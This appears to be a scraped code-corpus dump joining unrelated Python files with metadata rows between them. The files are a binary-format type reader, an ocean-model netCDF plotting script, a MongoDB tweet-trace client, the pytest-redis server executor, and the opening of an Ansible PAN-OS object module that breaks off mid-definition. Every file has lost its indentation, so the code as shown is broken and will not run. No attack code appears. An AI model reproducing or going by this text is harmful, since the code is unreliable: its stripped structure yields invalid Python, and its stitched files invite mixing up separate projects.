poff = align(poff, alignOf(ctor[2]))
crs[ctor[1]] = makeReader(renv, ctor[2])
cns[ctor[1]] = ctor[0]
self.tr = UnpackReader('I', 4)
self.poff = poff
self.crs = crs
self.cns = cns
def read(self,m,offset):
t = self.tr.read(m,offset)
return VariantView(self.cns[t], Loader(self.crs[t].read, m, offset+self.poff))
class StrReader:
def __init__(self):
self.nr = UnpackReader('Q',8)
def read(self,m,offset):
n=self.nr.read(m,offset)
return m[offset+8:offset+8+n]
class ArrReaderGenerator:
def __init__(self, m, reader, size, offset):
self.r = reader.r
self.size = size
self.offset = offset
self.m = m
self.vlen = reader.vlen
def __len__(self):
return self.size
def __call__(self):
o = self.offset
for i in xrange(0, self.size):
tv = self.get(i)
o += self.vlen
yield(tv)
def __getitem__(self, i):
if not isinstance(i, (int,long)):
raise StopIteration
return self.get(i)
def get(self, index):
if index >= self.size:
raise StopIteration
o = self.offset + self.vlen * index
return self.r.read(self.m, o)
class ArrReader:
def __init__(self,renv,ty):
self.nr = UnpackReader('Q',8)
self.r = makeReader(renv,ty)
self.vlen = sizeOf(ty)
def read(self,m,offset):
n=self.nr.read(m,offset)
return ArrReaderGenerator(m, self, n, offset+8)
class NYIReader:
def read(self,m,offset):
raise Exception("nyi")
globalTypeExts={}
def makeCustomReader(name, renv, ty, repty):
mkR = globalTypeExts.get(name)
if (mkR != None):
return mkR(renv, ty, repty)
else:
raise Exception("I don't know how to decode this type: " + str(ty))
def makePrimReader(renv, p):
if (p.name == "unit"):
return UnitReader()
elif (p.name == "bool"):
return UnpackReader('?', 1)
elif (p.name == "char"):
return UnpackReader('c', 1)
elif (p.name == "byte"):
return UnpackReader('B', 1)
elif (p.name == "short"):
return UnpackReader('H', 2)
elif (p.name == "int"):
return UnpackReader('I', 4)
elif (p.name == "long"):
return UnpackReader('Q', 8)
elif (p.name == "float"):
return UnpackReader('f', 4)
elif (p.name == "double"):
return UnpackReader('d', 8)
elif (p.rep != None):
return makeCustomReader(p.name, renv, p, p.rep)
else:
raise Exception("I don't know how to decode the primitive type: " + p.name)
def makeFArrReader(renv,fa):
return FArrReader(renv, fa.ty, fa.tlen.n)
def makeArrReader(renv,a):
if (isinstance(a.ty,Prim) and a.ty.name == "char"):
return StrReader()
else:
return ArrReader(renv,a.ty)
def makeVariantReader(renv,v):
if (len(v.ctors)==2 and v.ctors[0][0] == ".f0" and v.ctors[0][1] == 0 and isinstance(v.ctors[0][2],Prim) and v.ctors[0][2].name == "unit"):
return MaybeReader(renv,v.ctors[1][2])
elif (all(map(lambda c: isinstance(c[2],Prim) and c[2].name=="unit", v.ctors))):
return EnumReader(v.ctors)
else:
return VariantReader(renv,v.ctors)
def makeStructReader(renv,s):
if (len(s.fields) == 0):
return UnitReader()
elif (s.fields[0][0][0] == '.'): # should we read this as a tuple?
return TupleReader(renv, map(lambda f:f[2], s.fields))
else:
return StructReader(renv, map(lambda f:f[0], s.fields), map(lambda f:f[2], s.fields))
def makeAppReader(renv,app):
if (isinstance(app.f,Prim)):
return makeCustomReader(app.f.name, renv, app, evalApp(app.f, app.args))
else:
raise Exception("I don't know how to read '" + str(app) + "'")
class RecReader:
def __init__(self):
self.r = None
def read(self,m,offset):
return self.r.read(m,offset)
def makeRecReader(renv, rec):
o = renv.get(rec.vn)
r = RecReader()
renv[rec.vn] = r
r.r = makeReader(renv, rec.ty)
if (o != None):
renv[rec.vn]=o
else:
renv.pop(rec.vn, None)
return r
def makeVarReader(renv, vn):
if vn in renv:
return renv[vn]
else:
raise Exception("Can't make reader with variable not in environment: " + vn)
def makeReader(renv,ty):
readerDisp = {
"prim": lambda p: makePrimReader(renv, p),
"var": lambda v: makeVarReader(renv, v.name),
"farr": lambda fa: makeFArrReader(renv,fa),
"arr": lambda a: makeArrReader(renv,a),
"variant": lambda v: makeVariantReader(renv,v),
"struct": lambda s: makeStructReader(renv,s),
"long": lambda n: fail("Can't read type-level number: " + str(n.n)),
"app": lambda a: makeAppReader(renv,a),
"rec": lambda r: makeRecReader(renv,r),
"abs": lambda a: fail("Can't read type-level function: " + str(a))
}
return TyCase(readerDisp).apply(ty)
#######
#
# the user interface to structured data
#
#######
def formatRow(cns, cs, r):
s=''
for k in range(len(cs)-1):
s += cs[k][r].ljust(cns[k], ' ')
s += cs[len(cs)-1][r]
return s
def tableFormat(cs):
cns=[]
rc=0
for c in cs:
n = 0
rc = len(c) if rc==0 else min(rc, len(c))
for s in c:
n = max(n, len(s))
cns.append(n)
s = ''
if (rc > 0):
s = formatRow(cns, cs, 0)
for r in range(1, rc):
s += '\n' + formatRow(cns, cs, r)
return s
class FRegion:
def __init__(self, fpath):
self.rep = FREnvelope(fpath)
for vn, bind in self.rep.env.items():
bind.reader = makeReader({}, bind.ty)
@staticmethod
def addType(name, gen):
globalTypeExts[name] = gen
def __str__(self): return self.__repr__()
def __repr__(self):
vns = []
hts = []
tds = []
for vn, bind in self.rep.env.items():
vns.append(vn)
hts.append(' :: ')
tds.append(str(bind.ty))
return tableFormat([vns, hts, tds])
def __getattr__(self, attr):
b = self.rep.env.get(attr, None)
if (b == None):
raise Exception("FRegion has no field named '" + attr + "'")
else:
return b.reader.read(self.rep.m, b.offset)
class FRMeta:
def __init__(self, f): self.f = f
def __repr__(self): return repr(self.f)
def __getattr__(self, attr):
b = self.f.rep.env.get(attr, None)
if (b == None):
raise Exception("FRegion has no field named '" + attr + "'")
else:
return b
def meta(f): return FRMeta(f)
#######
#
# support common "application types" by default
#
#######
def RegReader(desc):
def newCls(cls):
FRegion.addType(desc, lambda renv, ty, repty: cls(renv, ty, repty))
return cls
return newCls
# date/time
@RegReader("datetime")
class DateTimeReader:
def __init__(self, renv, ty, repty):
self.nr = makeReader(renv, repty)
def read(self,m,o):
return datetime.datetime.fromtimestamp(self.nr.read(m,o)/1000000.0)
# file refs (within-file pointer types)
@RegReader("fileref")
class FileRefReader:
def __init__(self,renv,ty,repty):
self.refr = makeReader(renv,repty)
self.r = makeReader(renv,ty.args[0])
def read(self,m,offset):
o=self.refr.read(m,offset)
if (o==0):
return None
else:
return self.r.read(m,o)
# carrays (variable-length arrays stored with a static capacity)
FRegion.addType("carray", lambda renv, ty, repty: makeArrReader(renv, Arr(ty.args[0])))
# darrays (old style variable-length arrays stored with capacity)
@RegReader("darray")
class DArrReader:
def __init__(self,renv,ty,repty):
self.ar = makeArrReader(renv,Arr(ty.args[0]))
def read(self,m,offset):
return self.ar.read(m,offset+8)
# skip-list maps
class SLView:
def __init__(self,sl):
self.sl=sl
@staticmethod
def findNextGLEB(n, level, k):
while (not(n==None)):
sn=n.next[level]
if (sn==None or k < sn.key):
if (level==0):
return n
else:
level=level-1
elif (sn.key <= k):
n = sn
else:
return n
def __getitem__(self,k):
if (self.sl.count==0):
return None
else:
n = SLView.findNextGLEB(self.sl.root, len(self.sl.root.next)-1, k)
if (not(n == None) and n.key==k):
return n.value
else:
return None
def __contains__(self,k):
if (self.sl.count==0):
return False
else:
n=SLView.findNextGLEB(self.sl.root, len(self.sl.root.next)-1, k)
return (not(n==None) and n.key==k)
def __iter__(self):
n=self.sl.root.next[0]
while (not(n==None)):
yield (n.key,n.value)
n=n.next[0]
def __len__(self): return self.sl.count
def __str__(self): return self.__repr__()
def __repr__(self):
ks=[]
eqs=[]
vs=[]
n=self.sl.root().next[0]
while (not(n == None)):
ks.append(str(n.key))
eqs.append(' = ')
vs.append(str(n.value))
n=n.next[0]
return tableFormat([ks,eqs,vs])
@RegReader("slmap")
class SLMapReader:
def __init__(self,renv,ty,repty):
self.sr = makeReader(renv, repty)
def read(self,m,offset):
return SLView(self.sr.read(m,offset))
#uuid
class HobUUID(uuid.UUID):
def __init__(self, *args, **kwargs):
uuid.UUID.__init__(self, *args, **kwargs)
def __str__(self):
return base64.b64encode(self.bytes, '-_')[:-2] + 'A'
@staticmethod
def bytes2uuid(bs):
return HobUUID(bytes=''.join(chr(e) for e in bs))
@RegReader("uuid")
class UuidReader:
def __init__(self, renv, repty, ty):
self.nr = FArrReader(renv, Prim("byte", None), 16)
@LazyRead(True)
def read(self, m, o):
bs = self.nr.read(m,o)
return HobUUID(bytes=''.join(chr(e) for e in bs))
#######
#
# Stored sequences (fseq T n) with representation (^x.(()+((carray T n) * x@?)))@?
#
#######
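# In other words (as read by RecStream below): the stored value is a reference
# to a cons-list whose cells carry a chunk of up to n elements plus a reference
# to the next cell; RecStream walks the cells and flattens the chunks into one
# sequence.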
class RecStream:
def __init__(self, stream):
self.nodes = []
self._reload(stream)
def _reload(self, stream):
self.data = stream
def generate_node(s):
if s[0]:
self.nodes.append(s[0])
if s[1] != None:
generate_node(s[1])
generate_node(stream)
def iter(self):
for nd in self.nodes:
for v in nd():
yield v
def __len__(self):
return sum((len(x) for x in self.nodes))
def __str__(self):
sz = 0
content = ""
for v in self.iter():
sz += 1
if sz > 10:
content += "... ... ..."
break
content += "{}. {}\n".format(sz, v)
return content
def __getitem__(self, i):
c = 0
for nd in self.nodes:
if i >= (c + len(nd)):
c += len(nd)
else:
return nd[i-c]
raise StopIteration
@RegReader("fseq")
class FSeqReader:
def __init__(self, renv, repty, ty):
self.rr = makeReader(renv, ty)
def read(self, m, o):
return RecStream(self.rr.read(m,o))
| apache-2.0 | -8,184,452,706,866,680,000 | 25.073266 | 152 | 0.582207 | false |
tiagoams/blueC_fluxes | int_adv.py | 1 | 2848 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
budget_term_densities
Calculates density maps for nutrient budget terms from NEMO-ERSEM output.
NERC-DEFRA SSB-BlueC projects
Created on Tue Jan 24 09:18:52 2017
@author: TAMS00
"""
#import pandas as pd
import netCDF4
import xarray as xr
import numpy as np
import os
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, cm
import argparse
if (('Windows' in os.environ['OSTYPE']) and
(os.environ['COMPUTERNAME']=='PC4447')):
base='c:/Users/tams00/Documents/nerc_ssb/c_fluxes/AMM7-HINDCAST-v0-erosion'
else:
base='/nerc/n01/n01/momme/AMM7-HINDCAST-v0-erosion'
modelpaths=[os.path.join(base+'/1981/01/','amm7_1d_19810101_19810131_grid_T.nc')]#,
#os.path.join(base+'/1981/02/','amm7_1d_19810201_19810228_grid_T.nc')]
#os.path.join(base+'/1981/01/','restart_trc.nc'),
#modelvars=[['Y4_fdetrc_result']]
#modelvars=[['net_PelBen_POC_result','G3_c_pb_flux','nav_lon','nav_lat'],
#['fabm_st2DnQ1_c','fabm_st2DnQ6_c','fabm_st2DnQ7_c','fabm_st2DnQ17_c','fabm_st2DnH1_c','fabm_st2DnH2_c','fabm_st2DnY2_c','fabm_st2DnY3_c','fabm_st2DnY4_c','fabm_st2DnG3_c'],
#['fabm_st2DnQ1_c','fabm_st2DnQ6_c','fabm_st2DnQ7_c','fabm_st2DnQ17_c','fabm_st2DnH1_c','fabm_st2DnH2_c','fabm_st2DnY2_c','fabm_st2DnY3_c','fabm_st2DnY4_c','fabm_st2DnG3_c']]
par_3d=['TRNO3_c','TRNP1_c','TRNP2_c','TRNP3_c','TRNP4_c','TRNB1_c','TRNZ4_c','TRNZ5_c','TRNZ6_c','TRNR4_c','TRNR6_c','TRNR8_c','TRNR1_c','TRNR2_c','TRNR3_c','TRNL2_c']
par_2d=['fabm_st2DnQ1_c','fabm_st2DnQ6_c','fabm_st2DnQ7_c','fabm_st2DnQ17_c','fabm_st2DnH1_c','fabm_st2DnH2_c','fabm_st2DnY2_c','fabm_st2DnY3_c','fabm_st2DnY4_c','fabm_st2DnG3_c']
adv_3d=['XAD_O3_c_e3t']
modelvars=adv_3d
# main() takes an optional 'argv' argument, which allows us to call it from the interactive Python prompt:
def main(argv=None):
parser = argparse.ArgumentParser()
parser.add_argument('--basedir',nargs=1,help='base directory with model files')
args = parser.parse_args()
print(args)
if args.basedir:
# argparse nargs=1 yields a list, so take the single element
base = args.basedir[0]
# Naughty datasets might require decode_cf=False
# Here it just needed decode_times=False
print('********************')
print(modelpaths[0])
#data = xr.open_dataset(modelpaths[0],decode_times=False)
modelout = xr.open_mfdataset(modelpaths) #,decode_times=False)
#print(modelout)
for modelvar in modelvars:
vardf=modelout[modelvar]
print(vardf)
# print attributes
for at in vardf.attrs:
print(at+':\t\t',end=' ')
print(vardf.attrs[at])
timeavg=vardf.mean('time_counter')
timeavg.plot()
if __name__ == "__main__":
main()
| gpl-3.0 | 214,627,983,886,993,120 | 32.313253 | 179 | 0.629916 | false |
unibg-gislab/treets | treets/db_client.py | 1 | 5982 | #! /urs/bin/python
# coding: utf8
from __future__ import print_function
import pymongo
from random import uniform
TWEETS_LIMIT = 0
TRACES_LIMIT = 0
class DBClient(object):
'''MongoDB client exposing tweet and per-user trace queries over the treets database.'''
def __init__(self):
super(DBClient, self).__init__()
self.mongo = pymongo.MongoClient()
self.db = self.mongo.treets
self.db.tweets.create_index('userName')
self.db.users.create_index([('userName', 'text')])
self.db.tweets.create_index([('textMessage', 'text')])
self.db.tweets.ensure_index([('location', pymongo.GEOSPHERE)])
#self.users = self.tweets.distinct('userName')[:limit]
def setup_db(self):
self.create_locations()
self.check_text_index()
self.create_users_collection()
self.remove_users_and_tweets(100)
def remove_users_and_tweets(self, threshold_max, threshold_min=1):
found = self.db.users.find( { '$where': 'this.tweetsIds.length >' + str(threshold_max) })
for u in found:
self.db.tweets.remove({'_id': {'$in': u['tweetsIds']}})
self.db.users.remove( u )
def create_users_collection(self):
self.db.users.remove()
users = self.db.tweets.distinct('userName')
users_coll = []
for u in users:
user = {}
user['userName'] = u
user['tweetsIds'] = self.db.tweets.find({'userName': u}).distinct('_id')
users_coll.append(user)
self.db.users.insert(users_coll)
def create_locations(self):
print('creating locations for geo-indexing, this may take a while')
for t in self.db.tweets.find():
coords = t['geo']
t['location'] = {'type': 'Point', 'coordinates': coords[::-1]}
self.db.tweets.save(t)
self.db.tweets.ensure_index([('location', pymongo.GEOSPHERE)])
def check_text_index(self):
try:
self.db.tweets.create_index([('textMessage', 'text')])
except:
print('converting texts to unicode, this may take a while')
for t in self.db.tweets.find():
t['textMessage'] = unicode(t['textMessage'])
self.db.tweets.save(t)
self.db.tweets.create_index([('textMessage', 'text')])
def get_tweets(self, limit=TWEETS_LIMIT):
'''
Returns first <limit> tweets
'''
return self.db.tweets.find().sort([('_id', -1)]).limit(limit)
def get_random_tweets(self, limit=TWEETS_LIMIT):
'''
returns <limit> random tweets
'''
lenght = self.db.tweets.find().count()
rand = int(uniform(0, 1)*lenght)
return self.db.tweets.find().limit(limit).skip(rand)
def get_tweets_near_point(self, coords, dist, limit=TWEETS_LIMIT):
'''
returns <limit> tweets within <dist> meters from coords
'''
return self.db.tweets.find({
'location': {
'$nearSphere': {
'$geometry': {
'type': 'Point', 'coordinates': coords
}, '$maxDistance': dist
}
}
}).sort([('_id', -1)])
def get_tweets_near_point_and_text(self, coords, dist, text, limit=TWEETS_LIMIT):
'''
returns <limit> tweets within <dist> of coords whose text matches <text>
'''
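# Note: $centerSphere takes a radius in radians, so dist is divided by the
# Earth's radius in kilometres (6378.1); unlike get_tweets_near_point above,
# dist here is therefore interpreted in kilometres rather than metres.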
return self.db.tweets.find(
{
"$and":
[{"location":{'$geoWithin':{'$centerSphere': [coords,dist/6378.1]}}},
{'$text':{'$search': text}}]
}).sort([('_id', -1)])
def get_tweets_for_text(self, text, limit=TWEETS_LIMIT):
'''
Search for tweets containing <text> and return the results
'''
return self.db.tweets.find({'$text': {'$search': text}}).sort([('_id', -1)]).limit(limit)
def get_tweets_for_user(self, user, limit=TWEETS_LIMIT):
'''
returns tweets posted by user
'''
return self.db.tweets.find({'_id': {'$in': user['tweetsIds']}})
#return self.db.tweets.find({'userName': user}).sort([('_id', -1)]).limit(limit)
def get_tweets_for_user_str(self, username, limit=TWEETS_LIMIT):
user = self.db.users.find_one({'$text': {'$search': username}})
if user:
return [self.get_tweets_for_user(user, limit)]
else:
return []
def get_traces(self, limit=TRACES_LIMIT):
'''
Returns first <limit> lists of tweets from the same users
'''
users = self.db.users.find().limit(limit)
return [self.get_tweets_for_user(user) for user in users]
def get_traces_near_point(self, coords, dist, limit=TRACES_LIMIT):
'''
Return per-user tweet traces that have at least one tweet within <dist> of coords
'''
users = self.get_tweets_near_point(coords, dist).distinct('userName')
users_objs = self.db.users.find({'userName': {'$in': users}}).limit(limit)
return [self.get_tweets_for_user(user) for user in users_objs]
def get_traces_near_point_and_text(self, coords, dist, text, limit=TRACES_LIMIT):
'''
Return per-user tweet traces with at least one tweet within <dist> of coords matching <text>
'''
users = self.get_tweets_near_point_and_text(coords, dist, text).distinct('userName')
users_objs = self.db.users.find({'userName': {'$in': users}}).limit(limit)
return [self.get_tweets_for_user(user) for user in users_objs]
def get_traces_for_text(self, text, limit=TRACES_LIMIT):
'''
Return per-user tweet traces with at least one tweet matching <text>
'''
users = self.get_tweets_for_text(text, limit=limit).distinct('userName')
users_objs = self.db.users.find({'userName': {'$in': users}}).limit(limit)
return [self.get_tweets_for_user(user) for user in users_objs]
def get_trace_for_user(self, username):
'''
Return the trace (all stored tweets) for the given username
'''
return self.get_tweets_for_user_str(username)
if __name__ == '__main__':
client = DBClient()
#client.create_users_collection()
client.remove_users_and_tweets(100, 3)
| mit | -6,620,564,958,461,042,000 | 35.699387 | 97 | 0.564694 | false |
ClearcodeHQ/pytest-redis | src/pytest_redis/executor.py | 1 | 7872 | # Copyright (C) 2017 by Clearcode <http://clearcode.cc>
# and associates (see AUTHORS).
# This file is part of pytest-redis.
# pytest-redis is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# pytest-redis is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public License
# along with pytest-redis. If not, see <http://www.gnu.org/licenses/>.
"""Redis executor."""
import os
import platform
import re
from collections import namedtuple
from itertools import islice
from pathlib import Path
from tempfile import gettempdir
from typing import Union
from mirakuru import TCPExecutor
from py.path import local
MAX_UNIXSOCKET = 104
if platform.system() == "Linux":
MAX_UNIXSOCKET = 107
def compare_version(version1, version2):
"""
Compare two version numbers.
:param str version1: first version to compare
:param str version2: second version to compare
:rtype: int
:returns: return value is negative if version1 < version2,
zero if version1 == version2
and strictly positive if version1 > version2
"""
def normalize(ver):
return [int(x) for x in re.sub(r"(\.0+)*$", "", ver).split(".")]
def cmp_v(ver1, ver2):
return (ver1 > ver2) - (ver1 < ver2)
return cmp_v(normalize(version1), normalize(version2))
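# For example: compare_version("2.6.1", "2.6") > 0,
# compare_version("2.6.0", "2.6") == 0 and compare_version("2.4", "2.6") < 0.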
def extract_version(text):
"""
Extract version number from the text.
:param str text: text that contains the version number
:rtype: str
:returns: version number, e.g., "2.4.14"
"""
match_object = re.search(r"\d+(?:\.\d+)+", text)
if match_object:
extracted_version = match_object.group(0)
else:
extracted_version = None
return extracted_version
class RedisUnsupported(Exception):
"""Exception raised when redis<2.6 would be detected."""
class RedisMisconfigured(Exception):
"""Exception raised when the redis_exec points to non existing file."""
class UnixSocketTooLong(Exception):
"""Exception raised when unixsocket path is too long."""
NoopRedis = namedtuple("NoopRedis", "host, port, unixsocket")
class RedisExecutor(TCPExecutor):
"""
Redis executor.
Extends TCPExecutor with all the logic required to parametrise and properly
construct the command that starts redis-server.
"""
MIN_SUPPORTED_VERSION = "2.6"
"""
Minimum required version of redis that is accepted by pytest-redis.
"""
def __init__(
self,
executable,
databases,
redis_timeout,
loglevel,
host,
port,
timeout=60,
save="",
daemonize="no",
rdbcompression=True,
rdbchecksum=False,
syslog_enabled=False,
appendonly="no",
datadir: Union[local, Path] = None,
): # pylint:disable=too-many-locals
"""
Init method of a RedisExecutor.
:param str executable: path to redis-server
:param int databases: number of databases
:param int redis_timeout: client's connection timeout
:param str loglevel: redis log verbosity level
:param str host: server's host
:param int port: server's port
:param int timeout: executor's timeout for start and stop actions
:param str save: redis save configuration setting
:param str daemonize:
:param bool rdbcompression: Compress redis dump files
:param bool rdbchecksum: Whether to add checksum to the rdb files
:param bool syslog_enabled: Whether to enable logging
to the system logger
:param datadir: location where all the process files will be located
:param str appendonly:
"""
if not datadir:
datadir = Path(gettempdir())
self.unixsocket = str(datadir / f"redis.{port}.sock")
self.executable = executable
logfile_path = datadir / f"redis-server.{port}.log"
pidfile_path = datadir / f"redis-server.{port}.pid"
command = [
self.executable,
"--daemonize",
daemonize,
"--rdbcompression",
self._redis_bool(rdbcompression),
"--rdbchecksum",
self._redis_bool(rdbchecksum),
"--appendonly",
appendonly,
"--databases",
str(databases),
"--timeout",
str(redis_timeout),
"--pidfile",
str(pidfile_path),
"--unixsocket",
self.unixsocket,
"--dbfilename",
f"dump.{port}.rdb",
"--logfile",
str(logfile_path),
"--loglevel",
loglevel,
"--syslog-enabled",
self._redis_bool(syslog_enabled),
"--port",
str(port),
"--dir",
str(datadir),
]
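# Sketch of how a save setting is expanded below: save="900 1 300 10" appends
# "--save 900 1" and "--save 300 10" to the command.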
if save:
save_parts = save.split()
assert all(
(part.isdigit() for part in save_parts)
), "all save arguments should be numbers"
assert (
len(save_parts) % 2 == 0
), "there should be even number of elements passed to save"
for time, change in zip(islice(save_parts, 0, None, 2), islice(save_parts, 1, None, 2)):
command.extend([f"--save {time} {change}"])
super().__init__(command, host, port, timeout=timeout)
@classmethod
def _redis_bool(cls, value):
"""
Convert the boolean value to redis's yes/no.
:param bool value: boolean value to convert
:returns: yes for True, no for False
:rtype: str
"""
return "yes" if value and value != "no" else "no"
def start(self):
"""Check supported version before starting."""
self._check_unixsocket_length()
self._check_version()
return super().start()
def _check_unixsocket_length(self):
"""Check unixsocket length."""
if len(self.unixsocket) > MAX_UNIXSOCKET:
raise UnixSocketTooLong(
f"Unix Socket path is longer than {MAX_UNIXSOCKET} "
f"allowed on your system: {self.unixsocket}. "
f"It's probably due to the temporary directory configuration. "
f"You can configure that for python by changing TMPDIR envvar, "
f"add for example `--basetemp=/tmp/pytest` to your pytest "
f"command or add `addopts = --basetemp=/tmp/pytest` to your "
f"pytest configuration file."
)
def _check_version(self):
"""Check redises version if it's compatible."""
with os.popen(f"{self.executable} --version") as version_output:
version_string = version_output.read()
if not version_string:
raise RedisMisconfigured(
f"Bad path to redis_exec is given:"
f" {self.executable} not exists or wrong program"
)
redis_version = extract_version(version_string)
cv_result = compare_version(redis_version, self.MIN_SUPPORTED_VERSION)
if redis_version and cv_result < 0:
raise RedisUnsupported(
f"Your version of Redis is not supported. "
f"Consider updating to Redis {self.MIN_SUPPORTED_VERSION} at least. "
f"The currently installed version of Redis: {redis_version}."
)
| lgpl-3.0 | -2,153,815,324,643,324,000 | 32.21519 | 100 | 0.605183 | false |
PaloAltoNetworks-BD/ansible-pan | library/panos_object.py | 1 | 17603 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: panos_object
short_description: create/read/update/delete object in PAN-OS or Panorama
description:
- Policy objects form the match criteria for policy rules and many other functions in PAN-OS. These may include
- address objects, address groups, service objects, service groups, and tags.
author: "Bob Hagen (@rnh556)"
version_added: "2.4"
requirements:
- pan-python can be obtained from PyPI U(https://pypi.python.org/pypi/pan-python)
- pandevice can be obtained from PyPI U(https://pypi.python.org/pypi/pandevice)
deprecated:
removed_in: "2.9"
why: Updated to idempotent modules
alternative: >
Use M(panos_address_object), M(panos_address_group),
M(panos_service_object), M(panos_service_group), or
M(panos_tag_object) as appropriate.
notes:
- Checkmode is not supported.
- Panorama is supported.
options:
ip_address:
description:
- IP address (or hostname) of PAN-OS device or Panorama management console being configured.
required: true
username:
description:
- Username credentials to use for authentication.
required: false
default: "admin"
password:
description:
- Password credentials to use for authentication.
required: true
api_key:
description:
- API key that can be used instead of I(username)/I(password) credentials.
operation:
description:
- The operation to be performed. Supported values are I(add)/I(delete)/I(find).
required: true
addressobject:
description:
- The name of the address object.
address:
description:
- The IP address of the host or network in CIDR notation.
address_type:
description:
- The type of address object definition. Valid types are I(ip-netmask) and I(ip-range).
addressgroup:
description:
- A static group of address objects or dynamic address group.
static_value:
description:
- A group of address objects to be used in an addressgroup definition.
dynamic_value:
description:
- The filter match criteria to be used in a dynamic addressgroup definition.
serviceobject:
description:
- The name of the service object.
source_port:
description:
- The source port to be used in a service object definition.
destination_port:
description:
- The destination port to be used in a service object definition.
protocol:
description:
- The IP protocol to be used in a service object definition. Valid values are I(tcp) or I(udp).
servicegroup:
description:
- A group of service objects.
services:
description:
- The group of service objects used in a servicegroup definition.
description:
description:
- The description of the object.
tag_name:
description:
- The name of an object or rule tag.
color:
description: >
- The color of the tag object. Valid values are I(red, green, blue, yellow, copper, orange, purple, gray,
light green, cyan, light gray, blue gray, lime, black, gold, and brown).
vsys:
description:
- The vsys to put the object into.
- Firewall only.
default: "vsys1"
devicegroup:
description:
- The name of the (preexisting) Panorama device group.
- If undefined and ip_address is Panorama, this defaults to shared.
required: false
default: None
commit:
description:
- Commit the config change.
default: False
'''
EXAMPLES = '''
- name: search for shared address object
panos_object:
ip_address: '{{ ip_address }}'
username: '{{ username }}'
password: '{{ password }}'
operation: 'find'
address: 'DevNet'
- name: create an address group in devicegroup using API key
panos_object:
ip_address: '{{ ip_address }}'
api_key: '{{ api_key }}'
operation: 'add'
addressgroup: 'Prod_DB_Svrs'
static_value: ['prod-db1', 'prod-db2', 'prod-db3']
description: 'Production DMZ database servers'
tag_name: 'DMZ'
devicegroup: 'DMZ Firewalls'
- name: create a global service for TCP 3306
panos_object:
ip_address: '{{ ip_address }}'
api_key: '{{ api_key }}'
operation: 'add'
serviceobject: 'mysql-3306'
destination_port: '3306'
protocol: 'tcp'
description: 'MySQL on tcp/3306'
- name: create a global tag
panos_object:
ip_address: '{{ ip_address }}'
username: '{{ username }}'
password: '{{ password }}'
operation: 'add'
tag_name: 'ProjectX'
color: 'yellow'
description: 'Associated with Project X'
- name: delete an address object from a devicegroup using API key
panos_object:
ip_address: '{{ ip_address }}'
api_key: '{{ api_key }}'
operation: 'delete'
addressobject: 'Win2K test'
'''
RETURN = '''
# Default return values
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import get_exception
try:
from pan.xapi import PanXapiError
import pandevice
    from pandevice.base import PanDevice
    from pandevice.errors import PanDeviceError
from pandevice import panorama
from pandevice import objects
import xmltodict
import json
HAS_LIB = True
except ImportError:
HAS_LIB = False
def get_devicegroup(device, devicegroup):
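    # Refresh the device groups known to the Panorama instance and return the
    # DeviceGroup object whose name matches 'devicegroup', or False if no
    # match is found.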
dg_list = device.refresh_devices()
for group in dg_list:
if isinstance(group, pandevice.panorama.DeviceGroup):
if group.name == devicegroup:
return group
return False
def find_object(device, dev_group, obj_name, obj_type):
# Get the firewall objects
obj_type.refreshall(device)
if isinstance(device, pandevice.firewall.Firewall):
addr = device.find(obj_name, obj_type)
return addr
elif isinstance(device, pandevice.panorama.Panorama):
addr = device.find(obj_name, obj_type)
if addr is None:
if dev_group:
device.add(dev_group)
obj_type.refreshall(dev_group)
addr = dev_group.find(obj_name, obj_type)
return addr
else:
return False
def create_object(**kwargs):
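    # Build the appropriate pandevice object (address object, address group,
    # service object, service group, or tag) from the supplied keyword
    # arguments. Returns False if the required fields for the chosen object
    # type are missing.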
if kwargs['addressobject']:
newobject = objects.AddressObject(
name=kwargs['addressobject'],
value=kwargs['address'],
type=kwargs['address_type'],
description=kwargs['description'],
tag=kwargs['tag_name']
)
if newobject.type and newobject.value:
return newobject
else:
return False
elif kwargs['addressgroup']:
newobject = objects.AddressGroup(
name=kwargs['addressgroup'],
static_value=kwargs['static_value'],
dynamic_value=kwargs['dynamic_value'],
description=kwargs['description'],
tag=kwargs['tag_name']
)
if newobject.static_value or newobject.dynamic_value:
return newobject
else:
return False
elif kwargs['serviceobject']:
newobject = objects.ServiceObject(
name=kwargs['serviceobject'],
protocol=kwargs['protocol'],
source_port=kwargs['source_port'],
destination_port=kwargs['destination_port'],
tag=kwargs['tag_name']
)
if newobject.protocol and newobject.destination_port:
return newobject
else:
return False
elif kwargs['servicegroup']:
newobject = objects.ServiceGroup(
name=kwargs['servicegroup'],
value=kwargs['services'],
tag=kwargs['tag_name']
)
if newobject.value:
return newobject
else:
return False
elif kwargs['tag_name']:
t = objects.Tag
c = t.color_code(kwargs['color'])
newobject = objects.Tag(
name=kwargs['tag_name'],
color=c,
comments=kwargs['description']
)
if newobject.name:
return newobject
else:
return False
else:
return False
def add_object(device, dev_group, new_object):
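    # Attach the new object to the device group when one is given, otherwise
    # directly to the firewall/Panorama object, then push it with create().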
if dev_group:
dev_group.add(new_object)
else:
device.add(new_object)
new_object.create()
return True
def main():
argument_spec = dict(
ip_address=dict(required=True),
password=dict(no_log=True),
username=dict(default='admin'),
api_key=dict(no_log=True),
operation=dict(required=True, choices=['add', 'update', 'delete', 'find']),
addressobject=dict(default=None),
addressgroup=dict(default=None),
serviceobject=dict(default=None),
servicegroup=dict(default=None),
address=dict(default=None),
address_type=dict(default='ip-netmask', choices=['ip-netmask', 'ip-range', 'fqdn']),
static_value=dict(type='list', default=None),
dynamic_value=dict(default=None),
